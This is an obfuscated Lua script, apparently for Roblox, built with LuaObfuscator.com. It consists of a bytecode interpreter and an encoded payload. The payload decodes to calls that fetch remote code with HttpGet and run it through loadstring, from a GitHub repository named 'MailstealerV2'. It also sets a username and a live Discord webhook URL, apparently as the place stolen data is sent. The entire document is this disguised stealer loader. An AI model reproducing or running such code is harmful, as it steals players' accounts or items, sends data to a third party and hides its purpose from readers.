--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==0) then v84=(v31/(2^(v32-((1 + 1) -1))))%(2^(((v33-(1 -(877 -(282 + 595)))) -(v32-1)) + (2 -1))) ;return v84-(v84%(620 -(555 + 64))) ;end end else local v85=((2570 -(1523 + 114)) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and ((834 + 94) -((304 -90) + 713))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1068 -(68 + 997)) );v19=v19 + (1274 -(226 + 1044)) ;return (v37 * (16441815 + 335401)) + (v36 * (285370 -219834)) + (v35 * (373 -(32 + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v66=0 + 0 ;while true do if (v66~=(2 -1)) then else if (v38~=(0 + 0)) then else local v98=0 -0 ;while true do if (v98==(0 -0)) then v39={};v40={};v98=1;end if (v98==1) then v41={};v42={v39,v40,nil,v41};v98=7 -5 ;end if (v98~=2) then else v38=1;break;end end end break;end if (v66==(0 + 0)) then if (v38==(2 + 0)) then local v99=0;while true do if (v99~=(1056 -(87 + 968))) then else return v42;end if (v99==(0 -0)) then for v104=1,v24() do local v105=0 + 0 ;local v106;local v107;local v108;while true do if (v105~=(2 -1)) then else v108=nil;while true do if (v106==(1414 -(447 + 966))) then while true do if (v107==0) then v108=v22();if (v21(v108,2 -1 ,1)==(1817 -(1703 + 114))) then local v174=701 -(376 + 325) ;local v175;local v176;local v177;local v178;while true do if (v174==(2 -0)) then while true do if (v175==(0 -0)) then local v179=0 + 0 ;while true do if (0==v179) then local v189=0;while true do if (v189==0) then v176=v21(v108,4 -2 ,17 -(9 + 5) );v177=v21(v108,4,6);v189=1;end if (v189~=1) then else v179=377 -(85 + 291) ;break;end end end if (v179~=(1266 -(243 + 1022))) then else v175=1;break;end end end if (v175~=(7 -5)) then else if (v21(v177,1,1)~=1) then else v178[2]=v44[v178[2 + 0 ]];end if (v21(v177,2,1182 -(1123 + 57) )==(1 + 0)) then v178[3]=v44[v178[257 -(163 + 91) ]];end v175=3;end if (v175==(1931 -(1869 + 61))) then v178={v23(),v23(),nil,nil};if (v176==0) then local v185=0 -0 ;local v186;while true do if (v185==(0 -0)) then v186=0 + 0 ;while true do if (0~=v186) then else v178[3 -0 ]=v23();v178[4]=v23();break;end end break;end end elseif (v176==1) then v178[3]=v24();elseif (v176==(2 + 0)) then v178[3]=v24() -(2^16) ;elseif (v176~=3) then else local v194=1474 -(1329 + 145) ;while true do if (v194~=(971 -(140 + 831))) then else v178[3]=v24() -(2^(1866 -(1409 + 441))) ;v178[4]=v23();break;end end end v175=2;end if (v175~=(721 -(15 + 703))) then else if (v21(v177,3,2 + 1 )==(439 -(262 + 176))) then v178[1725 -(345 + 1376) ]=v44[v178[4]];end v39[v104]=v178;break;end end break;end if (v174~=(688 -(198 + 490))) then else v175=0 -0 ;v176=nil;v174=2 -1 ;end if (v174~=(1207 -(696 + 510))) then else v177=nil;v178=nil;v174=2;end end end break;end end break;end if (v106~=(0 -0)) then else local v153=0;while true do if (v153==0) then v107=0;v108=nil;v153=1;end if (1==v153) then v106=1;break;end end end end break;end if (v105~=(1262 -(1091 + 171))) then else v106=0 + 0 ;v107=nil;v105=1;end end end for v109=1,v24() do v40[v109-(3 -2) ]=v29();end v99=1;end end end if (v38==(3 -2)) then local v100=374 -(123 + 251) ;while true do if ((9 -7)==v100) then v38=2;break;end if (0==v100) then local v102=0;while true do if (v102~=0) then else v43=v24();v44={};v102=699 -(208 + 490) ;end if (v102~=(1 + 0)) then else v100=1 + 0 ;break;end end end if (1==v100) then for v111=837 -(660 + 176) ,v43 do local v112=0;local v113;local v114;local v115;while true do if (v112~=(1 + 0)) then else v115=nil;while true do if (v113~=(203 -(14 + 188))) then else if (v114==(676 -(534 + 141))) then v115=v22()~=(0 + 0) ;elseif (v114==2) then v115=v25();elseif (v114==3) then v115=v26();end v44[v111]=v115;break;end if (v113==0) then local v155=0 + 0 ;while true do if (v155~=0) then else local v171=0 + 0 ;while true do if (v171==(0 -0)) then v114=v22();v115=nil;v171=1 -0 ;end if (v171~=(2 -1)) then else v155=1 + 0 ;break;end end end if (v155~=1) then else v113=1 + 0 ;break;end end end end break;end if (v112~=(396 -(115 + 281))) then else v113=0 -0 ;v114=nil;v112=1;end end end v42[3 + 0 ]=v22();v100=2;end end end v66=2 -1 ;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=0 -0 ;local v46;local v47;local v48;local v49;local v50;local v51;while true do if ((869 -(550 + 317))==v45) then v50=v21(v47,(1414 -(746 + 638)) -9 ,31);v51=((v21(v47,44 -12 )==1) and  -((1 + 1) -1)) or (286 -(134 + 151)) ;v45=3;end if (v45==((2532 -864) -(970 + 695))) then if (v50==0) then if (v49==(0 -0)) then return v51 * (1990 -(582 + (1749 -(218 + 123)))) ;else local v101=0 -(1581 -(1535 + 46)) ;while true do if (v101==(0 -0)) then v50=3 -2 ;v48=1824 -(1195 + 625 + 4) ;break;end end end elseif (v50==((392 + 2315) -660)) then return ((v49==0) and (v51 * (((802 -(306 + 254)) -(187 + 54))/0))) or (v51 * NaN) ;end return v8(v51,v50-(1803 -(162 + 618)) ) * (v48 + (v49/((2 + 0)^(35 + 17)))) ;end if (v45==(0 -0)) then v46=v24();v47=v24();v45=1 -(0 + 0) ;end if (v45==(1 + 0)) then v48=1637 -(1373 + 263) ;v49=(v21(v47,1001 -(451 + 549) ,7 + 13 ) * ((2 -0)^((103 -50) -21))) + v46 ;v45=2;end end end v26=nil;function v26(v52)local v53;if  not v52 then v52=v24();if (v52==(1467 -(899 + 568))) then return "";end end v53=v3(v16,v19,(v19 + v52) -(1 + 0) );v19=v19 + v52 ;local v54={};for v67=2 -1 , #v53 do v54[v67]=v2(v1(v3(v53,v67,v67)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=v1(v16,v19,v19);v19=v19 + 1 ;return v55;end v23=nil;function v23()local v56=603 -(268 + 335) ;local v57;local v58;while true do if (v56==(291 -(60 + 230))) then return (v58 * (828 -(426 + 146))) + v57 ;end if (((0 -0) + 0)==v56) then v57,v58=v1(v16,v19,v19 + (1458 -(282 + 1174)) );v19=v19 + (813 -(33 + 536 + 242)) ;v56=1;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then local v86=0;while true do if (v86==0) then v20=v0(v3(v59,1,1));return "";end end else local v87=v2(v0(v59,16));if v20 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v87,v20);v20=nil;v90=1;end end else return v87;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v69=v63;local v70=v64;local v71=v65;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v89=0;while true do if (v89==1) then if (v82<=9) then if (v82<=4) then if (v82<=1) then if (v82>0) then v73=v81[3];else v62[v81[3]]=v79[v81[2]];end elseif (v82<=2) then local v119=0;local v120;while true do if (v119==0) then v120=v81[2];v79[v120]=v79[v120](v13(v79,v120 + 1 ,v74));break;end end elseif (v82==3) then local v127=v81[2];local v128,v129=v72(v79[v127](v13(v79,v127 + 1 ,v81[3])));v74=(v129 + v127) -1 ;local v130=0;for v158=v127,v74 do v130=v130 + 1 ;v79[v158]=v128[v130];end else v79[v81[2]]=v81[3];end elseif (v82<=6) then if (v82==5) then local v121=0;local v122;local v123;while true do if (v121==0) then v122=v81[2];v123=v79[v81[3]];v121=1;end if (v121==1) then v79[v122 + 1 ]=v123;v79[v122]=v123[v81[4]];break;end end else v79[v81[2]]=v81[3];end elseif (v82<=7) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v62;else v79[v81[2]]=v62[v81[3]];end elseif (v82>8) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]]();end elseif (v82<=14) then if (v82<=11) then if (v82>10) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v62;else v79[v81[2]]=v62[v81[3]];end else v73=v81[3];end elseif (v82<=12) then do return;end elseif (v82==13) then local v139=v81[2];local v140,v141=v72(v79[v139](v13(v79,v139 + 1 ,v81[3])));v74=(v141 + v139) -1 ;local v142=0;for v166=v139,v74 do local v167=0;while true do if (v167==0) then v142=v142 + 1 ;v79[v166]=v140[v142];break;end end end else local v143=v81[2];local v144=v79[v81[3]];v79[v143 + 1 ]=v144;v79[v143]=v144[v81[4]];end elseif (v82<=16) then if (v82>15) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else do return;end end elseif (v82<=17) then v79[v81[2]]();elseif (v82>18) then local v149=0;local v150;while true do if (v149==0) then v150=v81[2];v79[v150]=v79[v150](v13(v79,v150 + 1 ,v74));break;end end else v62[v81[3]]=v79[v81[2]];end v73=v73 + 1 ;break;end if (v89==0) then v81=v69[v73];v82=v81[1];v89=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C657256322F6D61696E2F656E67696E6503083O00557365726E616D65030A3O0064616E69642O6F6E2O6903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313931302O3831383330342O3032383638322F434231497870767A5874664E597774426267346B615968364277344D47486173303258663933786C7965415676615F43473876704E30524A6C433231664C37315941514900143O0012043O00013O0026103O000B0001000200040A3O000B0001001207000100033O001207000200043O002005000200020005001204000400064O000D000200044O000200013O00022O001100010001000100040A3O001300010026103O00010001000100040A3O00010001001204000100083O002O12000100073O0012040001000A3O002O12000100093O0012043O00023O00040A3O000100012O000C3O00017O00",v9(),...);
